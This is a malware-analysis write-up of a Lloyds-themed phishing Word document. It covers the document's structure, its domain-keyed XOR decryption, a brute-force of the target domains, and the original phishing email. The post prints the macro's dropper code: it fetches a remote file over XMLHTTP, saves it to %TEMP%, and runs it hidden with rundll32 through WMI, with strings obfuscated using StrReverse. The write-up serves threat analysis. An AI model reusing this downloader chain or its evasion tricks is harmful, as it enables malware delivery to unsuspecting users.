This phishing document was interesting for not only its lure / cover, but also for the way it used encryption to target users who had a domain with certain key words in it. While brute forcing the domains only results in some potentially financial key words, the stage 2 domain acts as a pivot to find an original phish email in VT, which shows this was quite targeted after all.

File Info

Filename mud.doc
md5 86149cafa27cf964bacc18859bfb9b00
VT Link

Document Structure

The document is a full page image, with two VBA modules, “ThisDocument” and “NewMacros”.

remnux@remnux:~/host-malware/mud.doc$ df4e2efa8d2ec9f323b501d46d126c4f663b8d757c12954b885a17fa9a8ca46b
  1:       114 '\x01CompObj'
  2:       280 '\x05DocumentSummaryInformation'
  3:       416 '\x05SummaryInformation'
  4:      8866 '1Table'
  5:      4096 'Data'
  6:       498 'Macros/PROJECT'
  7:        71 'Macros/PROJECTwm'
  8: M   30499 'Macros/VBA/NewMacros'
  9: M    2269 'Macros/VBA/ThisDocument'
 10:      8337 'Macros/VBA/_VBA_PROJECT'
 11:      7465 'Macros/VBA/__SRP_0'
 12:       638 'Macros/VBA/__SRP_1'
 13:       976 'Macros/VBA/__SRP_2'
 14:       208 'Macros/VBA/__SRP_3'
 15:     11804 'Macros/VBA/__SRP_4'
 16:      1030 'Macros/VBA/__SRP_5'
 17:       827 'Macros/VBA/dir'
 18:       128 'ObjectPool/_1586936887/\x01CompObj'
 19:        32 'ObjectPool/_1586936887/\x03OCXNAME'
 20:         6 'ObjectPool/_1586936887/\x03ObjInfo'
 21:       552 'ObjectPool/_1586936887/\x03PRINT'
 22:        60 'ObjectPool/_1586936887/contents'
 23:    181815 'WordDocument'

Metadata shows it was created and last modified on the 4th of May, 2018, by KPMGUser. This user name is certainly a reference to the giant consulting firm, KPMG.


Document Display

The authors of this document went to some trouble to work on their cover story. The document is a Lloyds Banking Group themed phish, which is offering to search for old pensions under your name. They’re asking you to hit the “Authorize” button, and they are nice enough to tell you that you’ll need to enable macros to do this.

document image

This is interesting because they are not going with the typical claim of older version of office, or just click here. Rather, they’ve built a premise that, if you believe it, would actually require macros to run.

For what it’s worth, and don’t resolve in DNS. According to VT, they did in May:




The code within ThisDocument is the rest of the cover story. When you enable macros and click submit, you get a pop-up telling you that you’ve submitted, and telling you your current username, which the authors suspect is enough for the target to move on while they wait for results, which will never come.

remnux@remnux:~/host-malware/mud.doc$ -s 9 -v df4e2efa8d2ec9f323b501d46d126c4f663b8d757c12954b885a17fa9a8ca46b Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton"

Private Sub CommandButton1_Click()
User = Environ("USERNAME")
MsgBox "Thank you for submitting. Your username is : " + User
End Sub

Malicious VBA

The VBA is targeted towards very specific targets. The code is in the NewMacros module, and it execution on opening by implementing AutoOpen(), which simply calls RunMe.

The RunMe function takes the following actions:

  1. Initializes and attempts to decrypt a master key using the user’s domain as a key (keyVar = UCase(Environ("USERDNSDOMAIN"))).
  2. Uses the master key to decrypt a string url.
  3. Issue a GET request using Microsoft.XMLHTTP to get the url decrypted in 2, saving it to a file in Environ("TEMP").
  4. Creates a WMI object to create a rundll32.exe process to load the dll.

1. Decrypt Key with DNS Domain


The malware will need to download the next stage binary, but as an anti-forensics measure, it keeps the url for that binary encrypted, and the VBA contains the routines to decrypt it. The master key is encrypted 19 times, presumably with different target domains. So the code gets the current domain using keyVar = UCase(Environ("USERDNSDOMAIN")), and then tries to decrypt each of the 20 binaries objects hardcoded as “keySchedule”. If none of them can be decrypted, and error message is thrown, and the code exits.

The code looks like this:

Sub RunMe()
    Dim s, keyVar, sPlaintext As String
    Dim masterKey As Variant
    keyVar = UCase(Environ("USERDNSDOMAIN"))
    Dim payload As String
    payload = ""
    Dim i As Integer

    Dim keyScheduleBytes() As Variant
    Dim myURL As String
    Dim keySchedule(19) As String
    keySchedule(0) = "i+6d45jyleWY9cH3h/yB6oeljPOT/tih3rU="
    keySchedule(19) = "keWR7ZPunued+N3yjv+M+Imqj/CK9tes1qo="
    payload = payload & "uerr6erm67Xh86nk8rT19r/yofGx+u7s663+oLDpruevrvWss+64va7xpvHn"
    payload = payload & "or/n5eO+/qfxpqGrtOK0tfap9f3r8rLns/r996Tivq+34beyqA=="
    ReDim keyScheduleBytes(UBound(keySchedule))
    For i = 0 To UBound(keySchedule)
        keyScheduleBytes(i) = Decode64(keySchedule(i))

    masterKey = TryAllKeys(keyVar, keyScheduleBytes)

The TryAllKeys code does just that. When passed the keyVar (domain) and the keyScheduleBytes, it first breaks the domain into pieces (using the ExpandDotString function). Then it tries to decrypt each blob in the schedule with each piece of the domain, and if successful, returns the key, and otherwise raises and exception:

Function TryAllKeys(ByVal sInput As String, ByRef sKeys As Variant) As Byte()
    Dim candidates() As String
    Dim c As Variant
    candidates = ExpandDotString(sInput)

    For Each k In sKeys
        For Each c In candidates
            TryAllKeys = XorDecryptAndVerifyCRC(mascaktwo(c), k)
            If (Not Not TryAllKeys) <> 0 Then

                Exit Function
            End If

        Next c
    Next k

    Err.Raise vbObjectError + 555, "TryAllkeys", "Master key not found :/"
End Function

Brute Forcing the Domain - Technique

I wanted to figure out who was being targeted, so I grabbed a list of the top 10 million domains from here. Then, I wrote some modified versions of RunMe and TryAllKeys. In my version of RunMe, it ends after calling TryAllKeys. In my version of TryAllKeys, it fails silently, and pops a message box on success. Then here’s my wrapper, plus modified functions:

Sub brute()
    domains = "c:\domainlist.txt"
    Open domains For Input As #1

    Do Until EOF(1)
        Line Input #1, domain
        BruteRunMe (UCase(domain))

    Close #1

End Sub

Sub BruteRunMe(keyVar As String)

    Dim s, sPlaintext As String
    Dim masterKey As Variant
    Dim payload As String
    payload = ""
    Dim i As Integer

    Dim keyScheduleBytes() As Variant
    Dim myURL As String
    Dim keySchedule(19) As String
    keySchedule(0) = "i+6d45jyleWY9cH3h/yB6oeljPOT/tih3rU="
    keySchedule(19) = "keWR7ZPunued+N3yjv+M+Imqj/CK9tes1qo="
    payload = payload & "uerr6erm67Xh86nk8rT19r/yofGx+u7s663+oLDpruevrvWss+64va7xpvHn"
    payload = payload & "or/n5eO+/qfxpqGrtOK0tfap9f3r8rLns/r996Tivq+34beyqA=="
    ReDim keyScheduleBytes(UBound(keySchedule))
    For i = 0 To UBound(keySchedule)
        keyScheduleBytes(i) = Decode64(keySchedule(i))

	masterKey = BruteTryAllKeys(keyVar, keyScheduleBytes)

End Sub

Function BruteTryAllKeys(ByVal sInput As String, ByRef sKeys As Variant) As Byte()
    Dim candidates() As String
    Dim c As Variant
    candidates = ExpandDotString(sInput)

    For Each k In sKeys
        For Each c In candidates
            TryAllKeys = XorDecryptAndVerifyCRC(mascaktwo(c), k)
            If (Not Not TryAllKeys) <> 0 Then
                MsgBox ("Found Key: " & sInput & vbNewLine & "Key: " & c)
                Exit Function
            End If

        Next c
    Next k

End Function

I would later modify the code to write results to a file, so that I could let it run for a while and see what came out.

Brute Forcing the Domain - Results

If any of the following strings are found in the target’s domain when it’s split at the .s, then the key decrypts:

  • B
  • BB
  • BBB
  • BBBB
  • DWP
  • GSL
  • LSC
  • MEX
  • MIG
  • NCA
  • NO
  • NONO
  • RSF

We can also get the master key by putting a break at the return for TryAllKeys, and then using their own BytesToString function:

print BytesToString(TryAllKeys)

2. Decrypt String

With the master key decrypted, the code can now decrypt the url for the next stage payload:

    ciphertext = Decode64(payload)
    bPlaintext = XorDecryptAndVerifyCRC(masterKey, ciphertext)
    sPlaintext = BytesToString(bPlaintext)

    zzz = sPlaintext

Breaking at this point gives us the next stage:

Unfortunately (though not surprisingly), the link is no longer active.

3. Get the Binary

The next block of code gets the binary. While the url indicates this is a .docx, we’ll see it is actually a .dll executable file.

    Dim ampleMacarons
    Dim bStrm
    Dim filename
    Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM"))
    ampleMacarons.Open "GET", zzz, False
    Set dollop = CreateObject(StrReverse("maertS.bdodA"))
    dollop.Type = 1
    dollop.Write ampleMacarons.responseBody
    dstPath = Environ$("TEMP") & "\" & namePrefix & "_" & DateDiff("s", #1/1/1970#, Now()) & nameSuffix
    savePath = dstPath
    dollop.savetofile savePath, 2

To avoid filters, this section uses another obfuscation technique, putting all the strings through a reverse function. These are easy enough to undo by hand, but may avoid automated filters. The code creates a Microsoft.XMLHTTP object, uses it to issue a get request. Then, it creates a Adodb.Stream objection, which is passes in the response body, and uses that to save to %TEMP%\tialdyos_[timestamp count].dll.

4. Use WMI to create a rundll32 process to run the dll

Finally, the script uses WMI to create a process. Here’s the code:

    Const HIDDEN_WINDOW = 0
        strComputer = "."
        abc = StrReverse("23lldnur") & " " & dstPath & ",Start"
        strGetObject = StrReverse("2vmic\toor\.\\:stmgmniw")
        Set objWMIService = GetObject(strGetObject)
        Set objStartup = objWMIService.Get(StrReverse("putratSssecorP_23niW"))
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject(strGetObject & StrReverse("ssecorP_23niW:"))
        objProcess.Create abc, Null, objConfig, intProcessID

Here’s the code with the StrReverses removed:

    Const HIDDEN_WINDOW = 0
        abc = "rundll32 " & dstPath & ",Start"
        Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
        objProcess.Create abc, Null, objConfig, intProcessID

So it creates a WMI object, which starts a process with a hidden window, and runs it with command line rundll32 [downloaded.dll],Start.

In doing some quick looking at domain used to download the next stage, I found that VT had one “Files Referring”, which happened to be dated 4 days after the creation of the document:

document image

LBG Employee Benefits - Pensionio.msg

Converting to text

The msg file is a Outlook message file:

~/malware/mud.doc# file 68a4985515203c6c8274628e71b433444e32bbbc125ffdf88d7570c3960b2588
68a4985515203c6c8274628e71b433444e32bbbc125ffdf88d7570c3960b2588: CDFV2 Microsoft Outlook Message

We can convert it to something more readable using msgconvert, and get it in plain text.

Message Analysis

The email has no plain text section, only headers, and two attachments ‘lbg-pensionio-form-2018.doc’ and ‘ATT00001.htm’. Presumably most email clients would display ATT00001.htm as the body.


Basic Meta

The headers indicate the message was sent at 12:16 on May 8 +0100, from Jonathan Margate <> to The subject line, “LBG Employee Benefits - Pensionio” fits the lure.

The X-Originating-IP is, which is a DigitalOcean IP, so it’s likely not actually Pensionio.

The X-Filenames header reports the attachment names are “PGPexch.htm.pgp, Attachment1.pgp”. There’s a couple other PGP-related headers, so it seems that this message was sent encrypted, though it’s been decrypted by the time it’s uploaded to VT.

Symantec MessageLabs

The received headers show that the message coming to

Received: from ( by
 EXCLGVIRTUAL005.Global.Lloydstsb.Com ( with Microsoft SMTP
 Server (TLS) id 8.3.515.0; Tue, 8 May 2018 12:18:18 +0100
Received: from (HELO ([])  by with ESMTP/TLS/DES-CBC3-SHA; 08 May 2018
 12:18:16 +0100
Received: from ([])  by (PGP Universal service);  Tue, 08 May 2018
 12:18:17 +0100
Received: from ([])  by with ESMTP; 08 May 2018 12:17:55 +0100
Received: from [] (using TLSv1.2 with cipher
 DHE-RSA-AES256-GCM-SHA384 (256 bits))  by id 6B/DA-03930-A5781FA5; Tue, 08
 May 2018 11:17:46 +0000
Received: (qmail 9141 invoked from network); 8 May 2018 11:17:45 -0000
Received: from unknown (HELO pensionio) (  by with SMTP; 8 May 2018 11:17:45 -0000
Received: by pensionio (Postfix, from userid 1000)      id A278240D2A; Tue,  8 May
 2018 11:17:45 +0000 (UTC) actually redirects to a Symantec page, Based on the MX records associated with, Lloyds uses this service for email scanning:

~/malware/mud.doc# dig MX
;; ANSWER SECTION:	28800	IN	MX	10	28800	IN	MX	20

The X-Brightmail-Tracker header is also something Symantec uses to track false positives and false negatives.

Body (ATT00001.htm)

We can base64 decode this attachment, and view it in a browser:


So this is a very targeted phish towards a Lloyds employee, from a made up company. It’s pretty convincing. I wish we could see what was a


Unfortunately, as one might expect since it’s been 2+ months since this document’s creation, the download domain for the next stage isn’t available, so we can’t determine what the next stage of the attack might have been. Still, with the document and the original email, we got to see a targeted phishing threat against Lloyds Bank. This document was fun to play with since it provided a chance to brute force decrypt the payload, and included a somewhat targeted lure. And while the encryption certainly wasn’t that hard to break, it was definitely enough to keep the document from revealing it’s next steps to any automated sandboxes, which was likely the goal.